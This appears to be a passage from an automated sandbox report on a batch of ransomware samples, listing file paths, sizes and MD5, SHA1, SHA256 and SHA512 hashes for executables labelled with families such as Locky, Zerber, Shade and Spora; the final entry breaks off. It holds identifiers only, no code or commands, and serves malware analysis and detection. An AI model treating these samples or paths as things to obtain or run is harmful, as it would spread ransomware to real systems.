SHA111c74aac3aa7f33281860e64b43a01b716cb1e1d
SHA256ad75853b6bcb02bface566bddc8fc8fb647dacfe35e8e362a7be4a5e1cc0bb34
SHA512bd3991d7cea70b8d6a55e27d11dcb4d97b974fdaf5a9d3c438cd6febcfb4171a8c538b1493990e93284ba9231646e7ccd3c593af05aee22087d7fcc498c217b1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5999484c1590021db53b2cd251ddbfc7c
SHA130645dc762c2611d251ee204c9664c798aba2ba5
SHA256f10d24a5b85c8867781ba858135c755bc179d8d53317488b0ee16d7f04db6977
SHA512487be6aceb882095eeb6afcd124cd3a1246bd718ff4cdab8f7608c62389924c53cd046d71ffc8410beb83f213d01ac940b167d62101c1a90c01209596be1c1e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a2a07b10962554aec8065830aeb45fcf
SHA1346ef47232f2b470351224ad4b02dc7fa35cff8b
SHA2567e395b3b8020c5bad4b2d0b8358b872da9f70bb893af3b2461735376ef550bf3
SHA512937d02150de00216fa7aaf57c4702f8afb4e7ffb81f9f2263ee7adcab325f38fa97853bfc2a8ec22e173df21e31cdd4469f8d16a0db9ab18a7a0de22180f35d9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d70ea4604235bce0f56b6b488ea6f627
SHA1141ffc214ff8856cada2a5e748276b21b6fcd296
SHA2564cdc50fb68303fbf03414bb69dcf0d10c4192f6637c081fff66a55ecd32980db
SHA512c0d0b6bd48a1dbe5b753a07ef7c5ebb4ad56a5a62d3fa81608a3cde672c51164a861ecda58a04a2000049a6bc8b800d52eb63777c25f89d0919d12e4fe067d2f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5bd12d9a1fef5b37ea9e07cf45416cbce
SHA1b5326624b37e9e35773cee94e2eec2661fa9de1e
SHA256da41cdd8d30d767373304a9118c93e88c7838c63998a3407eef36e3758498597
SHA512c2e42397c6249dbf6e8fb449403078e7f1126fc2a42c4971f85a346528f5beb920387702cccee26983f63128d4122b561abc8a2ecf6deeb4de6c34d65ea31907
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c2adfe9e469a66cb3a06ff9c95145996
SHA1fc4023e5253ab29c476e11ca3ff58cc18056da82
SHA256ae3d4bbe5ada8d02b21dd23083cc1c3991b8ec8a660499f9bf68278b708dda74
SHA512d44387a0c77718cd01395c1a766a0a924c44b7ba9fa4a7cec72c72f78e766f9b6af9b5bbe98246a4780b992db16f86f629f964486fdd20ab5fafebcb00413d02
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD510f197f81d47abf221cb72e0e89cc442
SHA192792e0da88ac1dfe263c598951befc9b37974c5
SHA25696a82d3805d11ee9d0e0a8f4b1d6a6d8aa2846d68bddef08e141bdb936580750
SHA512b4e9afc2ce6219eb1641ee954bf6082aca6ebd942c48a57568f63b8c9f1247310050fd0f66ccc9b492dfb07f07486a8bea84dcbb2cdc3336592b5b6287955b11
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e4c66a81fba9df65bd056f6c8be02cb6
SHA13c4b0d51188d1bf7a080ea78eb0cac5e68915d49
SHA256552c20b23650c300fd7cd3211b4613173f7aa9df24f7545c5a19bf3abf82633e
SHA5122cf5118956e51eae2e6918a150010c9c7dda94159d54229fe16f30a7bbccd9e9a75bc0a6913433f030450b20decfab470a31d77e21d0f8058c40adcd0499e384
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fd69c87a23ffc08b405fb1366bfeea9e
SHA18dc5c5b0aaf017db85bec2091e4183b9dadd7627
SHA256a1d1a2f4e5af27335bfac25f2634841d2e18a230149d29f9c720e0ea2c0a77ad
SHA512ffcf1bb95dd236fff165d45e698679e531d38e09b52c685477cda98c83faa13ea2a9a145e07f32eaaff4671589f22e15be87ad5a35e857b043160f87851ed7eb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c990c0e188a8d96352a7cca1048b829e
SHA1d8595839448d721e404006a3a8d0965658460e7e
SHA256ae73e1c72899032ae4269cef712144165d3eb9ec446ed70072ff98d93a3a05ba
SHA51234a24e7ec649edcb11d10260017882b3f5aa12e511b5cd6c8d53f8a45e6d7685dd994213c276eccf53e8fe522bd1970845dfd0a094cfb497e7bb39fc0f67f5eb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD50dc8b180b032bd886f65f219021b17e6
SHA17a3878691219055736f2422d4e808adbc9866539
SHA256b305e0edfa5853af538a502b39467b5a1fa638730eb41f62b86bc356a83a860f
SHA5129b3e49361a35f17871729af5c05a76ba4018b9680bcc3b85388bc7777014ca700875c57042e1216a94a7534e158bfe8c39d7a90cb90dceba31cd70d874550d92
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
349B
MD5e8a23c166fa789e84413497ce9e8f81c
SHA10918389be08b42edae51ece71d038b4b29b40aac
SHA256a3c3c3da8c4ed6d881020247dd60e255bacfaf4038b22e1751c8cd5056a0ad6b
SHA51234337f8f27a9577b8355a95a4ecba66d7c02825e92233eec95e93257beb42a287b464280ea024a3a2af0e2664d6243665e74ecdfe578bd8bed398f49e8f981d2
-
Filesize
349B
MD5f9d8defffd0a73209c0edbdef952034e
SHA1ebbc64d189ab9c98afa267e993d407a5706da375
SHA25634b402e163e5361bc7ce5cb4c5f73e04887d268384ee9ffcb45d31a10d11c606
SHA5125b63e197cdd667a9880fc03dadbe5e04c54ae2d634d6b2ff98e4f51faeb21d33bb5187f69267cfe5783d923685b00f386186c297240090f01f985609942b4d74
-
Filesize
404B
MD52b5e3b8b9f06f7cf6a65e531a761bfea
SHA1907548a9821115631ce53b1ab81a834d016bae86
SHA2569e19e5bb3caee69f58ef4665a650963fe65f3c40926e0651348e4b6f97d37110
SHA512b239016c65cf0d08fce6e26bc75282ef7274419af38e5f3a7a147d9690558dc22e50d2d19379ae4c96e3c5af916fc2fb6a05b3f1096345e1027bc0423c866301
-
Filesize
41KB
MD570fd65b8bfee10150db3b5dd5f99e3d6
SHA1a63d4b76c61838ca59c334e731b65b7ca25d7e20
SHA256e720f917cd8a02b0372b85068844e132c42ea2c97061b81d378b5a73f9344003
SHA5127aaef6c7da251ae76724c3b57cee9236232a1b7822c28b792a8199e0868fce1601aeeac5f847d1522e7e465ad471f85242bfc60879ab4e074230fc8067294c47
-
Filesize
66KB
MD57cc4869bd92f6d82b29b1166458c2072
SHA1183d95bccf7eb5d30039d496979391f073c67987
SHA2569aa81e0ff347aa782debe0901a214d2822f8638b7630248e20104906eaccf0dd
SHA512ef047337de46f41b23397d88208a8f95de936dd6aa5f5fcb99eaa168ff082187cfdb3e7a1a1a4a08b1d4c5582134e4b0c9163c852b87e0bf0b38e74d1d679efb
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe
Filesize255KB
MD5adf8f62e10efeee9f97ab64c287f82c0
SHA103840691841e5bc9ffdb966bf82dd70cc52759ec
SHA2567d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6
SHA51233f1f84068217d96a47c560c46bd201fa1357a43b18c41fbbe49e002d6ea602896159e1fcf1b5b519ca9aa0cb55c137491adb53955ccd4592bbb0d4a6b52cbdb
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe
Filesize1.2MB
MD59975fa4ae55e091b1df3a09bf34c83fc
SHA1a1c13e056350f7e5c106c6aec3f3ae44bfd9ae57
SHA2561a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392
SHA5125b970c4ed9cb90f2e85171c0c598bdf5e52bbfd2a6c4a32bdc111e433eeb3bd679946bfa525c733d55dcecb5c5f3c19520f0499d33f71842b9ef0e5ef66fcdf5
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exe
Filesize1.2MB
MD56fb4a2231e26cd8e139ed1cdd64ce79b
SHA1033c4bf96cd9815a6f34ecceaadb3ef59db1ff39
SHA2566ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef
SHA512cf84782adf3d9c473285b2fdb5d403f6da4dcddee31429828d8b91c4a56ad8f028ce51caa29bf9cbe65398eced872870c228979b05f74ca470b0efe0f2e888c9
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe
Filesize622KB
MD553dd5bfa31066aec8fb5dfe320b44098
SHA1bc04d8388268fee1f9feded8fca065eeeae901f6
SHA256813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e
SHA512032991c203cbb1f94b3d614d10deabc69fa96046339457c710c447932be5b5f6aca09e411b57f5c46aa1c03f4e2acac6265d437ccb1412b5fdcfce6e54dac97a
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exe
Filesize1.2MB
MD52e16781b3484a45e019df0a158b91d0d
SHA19b721160f32efd3a4ddb745a8304a5efca8951a0
SHA2568a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944
SHA5124ab32fd63ca866d77a98596bf82104a5414829d7d0d907f595e7eb4964fc3d41e433a64b894b717b67b8640230e8948664f40df6b6894e5f28347e39cc14ca09
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exe
Filesize134KB
MD59f69924870406beb3edab0da57c34611
SHA1491bffd5597e5240f24c31f56e3378adc57319fc
SHA2561a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2
SHA512e8826b75d2e2ae588144217872bdcc7d59523923ce866ccc300220723f006ffa766cb608221cec14368e87da9f972d0f842bde57efd266bdb748463ff0d365dd
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe
Filesize380KB
MD5aaf21c8c3729738fb65b62dfc2cd76e5
SHA1a52f49b6c6fe5d35e1f7bbf3fa6fe4ece22e2660
SHA2561988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e
SHA51266321d2a7e91e173682ee9500c268547c22b6cfd1fae0406a3d25f9cea70b69799af501bb101868b5a2cf3b3bd16136cf4000ac03cd6f393afde99194289cc01
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe
Filesize416KB
MD5e6f652838b8ecba4e71b77b3e3d4ee6c
SHA1567bdc0e622c79363dd2609026ed0a5df2f79cdb
SHA256885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f
SHA5129cb09b8a0f971f186561bb311ab9059a01ac67159b143098eacd9be056c04f984cbf9edc29b57693a01200ac584bcfe808562c1ee7fe636005d671abe614b92f
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe
Filesize608KB
MD5f59af496321a044af3100904332be2b6
SHA19c06ad4305ffefa7b661951300cdddd56897b4fa
SHA25653e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486
SHA512886f80bdd3a0ce7c7728411f11e1d2ddf81e1bc9051dcd9ccb89668eed91fe091582528f7779d900ab5a6b5f350c480bcb5fa857d74003e772d83f14123abee5
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exe
Filesize197KB
MD5a19216e47592e6d1ed7bb8257e88abae
SHA1b552c0cad6e8c4ba9446582211b9281c6d502e0c
SHA256aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804
SHA51248222c34f59e41a466d810d7ab655fd27c3c797324d2f3e0b91f1d8651634b684944306f3344a577cf7d48d38a132d7962fdfd2592b6eac23acfb5ecb1e93a84
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe
Filesize381KB
MD590ba42b11544e6d5474900e1eda252ef
SHA1473a467fd19123e9c698403ff40a17e75db60d18
SHA256dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e
SHA51252811c12331176def279f4a38d6773a410928ebf179b35bf8fbe7a9bd886341a1ff85d4c8a4ffeddc7b083d8ea3117aba20b7cd20a488c61eeb1aa122436547b
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exe
Filesize64KB
MD57d3614df9409da3933637f09587af28c
SHA17db51e13c3011bfd1975ebabf8102a3a6f7c7474
SHA25689d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745
SHA5127380cf37ad5e9c3b0791562d05b6f1ea3963fab955ba19cb21015affaf0369a1ac6e01d7ccfa08d5ba3332feb3285a4a812b89102262e04df90d5daba614e4d2
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe
Filesize615KB
MD5dbfa3c500bda3e66df1588b8f30e1212
SHA18f1d2374279a2e331e35d284a282db9d2fcdb21a
SHA256eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c
SHA512d96132afce151ff860ef296275609c61275296092ea9f152f6028423e33aa858783cca9e47a14c9d1391c435f9bc19b0c12cd275a4f131fabd48a191ee4903b0
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exe
Filesize1.4MB
MD5647cd656cda2715e207d4087439dfb1e
SHA1904c468b010de8ea2e49b7ce4d31bac2d1af7912
SHA256c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61
SHA5129f90bc142b02b0b0f42c3a439699d7f5a4cf71af9417908cc2c6290dcb9ef86d2da5604a8fe0cfdf450cc05742119f8f718cc7b475f21c3f656d8eb6b157b330
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe
Filesize167KB
MD506c742bff5b593b08f8df07939e0328a
SHA1106c709075ec2f35523b1343a5918b8665d370de
SHA25651995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c
SHA5121839b2b7f8336322b5738d8e7d6e3a5e54cb381fba18724bcb100c869b4da5c87760119b23dbf8626408ce505e828d779c943cac58f38ca87824dde587cfdd0e
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe.bat
Filesize458B
MD502bf02e4ce67f967b549bb68b0900552
SHA1fd7bb8d4efd09272e1fd1a3f3fb775b4013b6aa2
SHA256e128fbc3aef7d30b52a9e99a9b84e178a70a14abc365ebb92c6fe4229a67657d
SHA51223d49069c04aa5f0e491eaa42d9698a5bcf1995a52198461c2f24521170df13ff082d1afba7209c783702659f8d39ae461f683135ca9435deb82bd609d41f2f7
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe
Filesize58KB
MD5c11c4c25e78d1dc4a9c3bc40ea2249d7
SHA160025450502ba114d1dd86a587941e6fe6d5b009
SHA256dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9
SHA512d4688fd0eddf63518039c19fadc0a3172cf823e805aacbbf94764f2c9814ba80e7cd2437967eade91d7e2d8bd6e83f2aa9757ee8df27f4cd8e4608d902122335
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe
Filesize454KB
MD5a3f2e6d126a423f9633dd469609a322e
SHA1b181d5df431419efc598b3e07a499948ead0cb7e
SHA2565b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e
SHA512643ca88de2947838d5cdc6a686c93165ef7914879aa5cf5cff0f3db314491e33dd6e8d615c2e11ea7aec208ae7f3b1f3059c75c687d492a113cf838e839fcc81
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exe
Filesize188KB
MD59f261000df30c0d255fd3e86952f9bc9
SHA1a97cfcfa755c241563445ddcfb2b6e6ad9a114cb
SHA2561f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1
SHA5124717452421b00563f6f3f47ce28cf90fdedec29f5044f77bd526de28c3ddd54e1438b82b1a4ec73418cc6c98b14625ace0d46413ba92cb304b6b5871a22ec878
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe
Filesize65KB
MD5ba9c6e8a31b0aad7af9d9264df6e3000
SHA10551e8a2567945a596fcd5b59de73e408d44cc39
SHA256240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3
SHA512890784df3fd29c9e624fd2df6eeda12ac76253a97d6ffd64d2eaedf1fbad71c19aeecaffc8d74be6e28d4ab0fcaf0e703b7d962e9ef1198d543cf446d5e52aea
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exe
Filesize261KB
MD517591ef371398c33a4bf6f3640c26c8f
SHA173048c328938f6639f95a5174ab7539d3b861b75
SHA256c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e
SHA512f1c3bdad5de3f25b54e4527545a7c3a0c2d6da609062ecf8487cf5b29bed979a55d557ea80f42ff995344149a7f2de9169760872ba4afc0e5d51ca5bb2015e07
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe
Filesize194KB
MD578c2f39344c72015c3088c41a20ea488
SHA103b29ce4b39f7ebeab4942fc4c1fd1516f133e2c
SHA256f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182
SHA5120d338873cbfe3e27f1604256cb5e824f262dc6717291a29768214a9fbab5d81312a685fee69a332991d2b190bdd62c76c23f55f9c88265639e37c6c6ed930019
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe
Filesize291KB
MD5c5b809da6ae5db220cc190899f69fdd9
SHA1da461c3cb15f021a74d999eef6f0df3a85591412
SHA256703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f
SHA512573f0a3d955f9282d381f8f3696ccdbf397bb7f1f68ded2ea655b219a18d5cdf0394cb471002b32df10b0f949d1df0ab3265eb73b667243aa23feed8a1e533df
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exe
Filesize1.1MB
MD59f89b03b643dfff83e0d38f760cf773d
SHA1588ad735ad453b257b03dc90eb8cfb1696f1bdac
SHA2560d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277
SHA51272cb2d6bd785c3dca269275f9a98fe7e1a380c4fb6ecdd1f3439c483614d4a599ec79f568ab0c7f08ec3f8895f139eeced61b110a2bc95faffd30f2ef104aff3
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exe
Filesize1.1MB
MD5fda1396c5d8fb5110e2a857581f23a65
SHA153859a145b6d7ac47df882d77d80eea0d56afb58
SHA256aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3
SHA512f31590dbd5a6ede24ca86165d6c1923a32d84530c89039ad38f768a781aefdd9441bfd4fa3a29a5145b64ea4898501b15ac8495a8fef0ca317a0ee30cdb27a76
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe
Filesize1.4MB
MD524b7e223ef0be5e865baa3f6ce7a66d3
SHA186ab9828f55393ebfa4216409f23c17e243b1516
SHA2569c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80
SHA512bf63510694e8d05288329655244feef8e8ca82c216aa3766a01f63746eccd7d82204999366ebcfc410ff3e08be8c4eaf6422fd4666360115dca5a493c0288e81
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exe
Filesize1.4MB
MD5096a090f932470b29833f8b1a8324405
SHA147b60767735a242c549cf13ffc8f5a93462c12c4
SHA2569ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7
SHA5122e48a1c213f3decdfd851dc3e445ec234ed5ee871c7aeec56459e04e3b03f56ee8fcbf827f833a1644870c4c6420b83f7324cda7ba35cbd15163f3ff2ca0d446
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe
Filesize759KB
MD57b1a60af2cc141ebf6132dff5c0440d1
SHA1af19d111eceb4e719d5295888b9e3e75c17a890b
SHA256c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3
SHA5124e58db9c94f5d7a739b1278ea88354ec22a9a275df9a50a7199b38554fcaf5243be64c3bc6085725b48e93dfe814090a244cb47ea101024e53c2e28775813042
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe
Filesize262KB
MD5acd48d71ed7077b12eaa3ff4596c1bac
SHA112382bb8dbaba71a2ee4325d78d832ac8f3b3fa7
SHA2561a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472
SHA51216e3fb6466c438012d439ba7932beced52519d0cff4e0fb68d796b7efcf98ca6397564efc78bb6a5616f99065a7d214858c097d19be0b90321e61b5b2cac8d1e
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe
Filesize476KB
MD54b684632603eaa131930ba743328c405
SHA19c124c252ce52cbfa17435efd0990a871620711f
SHA256f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e
SHA51253e8601b41a34ffec6aec7e20d4c454e9d0f9c597a85aa1d2cd20430c8bd678be09ac075c67fc6988b784c0fb20a43fb18b271bf1322ca14dd3482a88dc00d30
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eazv-9268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6.exe
Filesize300KB
MD55025d7939f4606966b56f1500086a2e3
SHA18505528c5b8d0de63f608e363ab206d587b6ede0
SHA2569268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6
SHA512d53bbf52772dabe725003d6c0a2147d7caba7fc8fc77d87ee03b60f5aa4fbbfae29f1edd4a0c0ed13146c40eeba18f1d77eb73e2e64f6d0d137b3603c8e752d9
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exe
Filesize260KB
MD55726a8710598c25c432de7ae89ea2cfc
SHA1b768c52daea4c35add68a9a46b04cd5158ec3fdf
SHA2565199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22
SHA512328a616489d4c5ae291373829dcd6cd3970142490c7351e16a01a42b61758be5598a4ed0dd8ed66e6a5356c7af80faac1d2cec0ec4b18d5ad95fbfef7658ab1f
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe
Filesize234KB
MD55736c7ca9fb94c74fccf9692a37a3b06
SHA1160f17c2db31bb4542818a4d5169eb681d09ce48
SHA256bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6
SHA5121d80a624ce21502ffbcae3f4d335033295d93f8e8d1065ef6f346f82cb9cbc932c6820535ed517ad1b5a0cfa633f1fb8753695caa891e4130fd5e275544f20fb
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe
Filesize305KB
MD534332450d6cb0640cb6a34979edf19d8
SHA1c7a45e7b24c238789076be36fc8f30ec5099562a
SHA256b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f
SHA512aebe09354658dcf97929894408e1721b0ef50d99128b6b49453b1e9818bbdce5aae0cc9e60ae1ea35db0dafc05e3a65dbef2ffd2132d3713c25f6c795b706263
-
C:\Users\Admin\Desktop\00294\VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe
Filesize6.0MB
MD5254347cb7e36157df07386d882994d77
SHA1ef794521414b92cadafc5026a772c1e9da93c059
SHA25688fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6
SHA512b643ad4926b99d8b1034f032c6cbd2e330318a45481a0d468d79a5cac2ab5ad4be7b10aff8a30fdba30436e2da460cf15c988d4d88e0c64ecd023b2a92fa7d23
-
Filesize
5KB
MD54a5162d66bb70a6b33f1c1a4e043f820
SHA103f23f8d114f147f1b9c1086413b11be816426d4
SHA256dd66796d59ece247a3d10b61a1b41794c67d69528584f9bd3a221dab7d28f2f9
SHA5124298dcbcdd48658fdf11703ee53bd921df8cfe1933a447accf6092235fc4c4ac01ba67973cc93277de21c33d1e2b34c7f631bca3a14f502e674d17c54b3f42c4
-
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
Filesize1KB
MD52912209d9dc1d26bfc91bf9b7378fdb1
SHA1423e308dd510393a388ec555fecd7e945c6d9b88
SHA256a43375940dd257f3559e1d62f6994d3c4d8180fc72e3c0eb2167aac81e9301d9
SHA5125bc6d5b90d028fa502327ed240e76393e182a5d66bd5a417517efd5e5ecf110908b165f226025cd717f9e2c1603f6695957f204fe6691ba1b5ee498677a980f5
-
Filesize
1KB
MD5f5ed0a35a26b759d6d6b30bea77fadaa
SHA1d802048c780336723ded4500b3287c39a5ce43dc
SHA256f428db43c172ad01ee0cf3a9338ecb4a15671ac5485784f1def07f6f865eda73
SHA5126adeed957e10abac7f23088dd3d6309154026f1d8f7e5bb92e856766cd0304bb0a2988b93c09096cfccb332f0a45b8bb4e7df9b8850bf485ec217093891fdf58
-
Filesize
76KB
MD5050b8492abda1a6f000376e5254829ca
SHA1e31506d8294b6f45915688557b6defe8bdc8e7ab
